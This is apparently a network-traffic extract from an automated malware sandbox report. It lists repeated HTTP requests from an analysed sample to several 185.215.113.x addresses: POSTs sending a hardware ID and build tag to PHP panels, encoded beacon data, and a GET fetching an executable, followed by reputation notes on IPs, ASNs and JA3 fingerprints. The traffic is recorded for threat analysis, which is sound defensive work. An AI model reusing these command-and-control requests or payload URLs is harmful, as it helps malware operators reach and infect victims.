Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="build"doma------AAKJKJDGCGDBGDHIJKJE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 30 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001092001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 2d 2d 0d 0a Data Ascii: ------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="build"doma------FCAAAAFBKFIECAAKECGC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 30 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001093001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="build"doma------GDAAKKEHDHCAAAKFCBAK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 2d 2d 0d 0a Data Ascii: ------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="build"doma------BAEBFIIECBGCBGDHCAFC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="build"doma------EHIIIJDAAAAAAKECBFBA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="build"doma------GIECFIEGDBKJKFIDHIEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="build"doma------BGCAFHCAKFBFIECAFIIJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="build"doma------JDHIEBFHCAKEHIDGHCBA--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
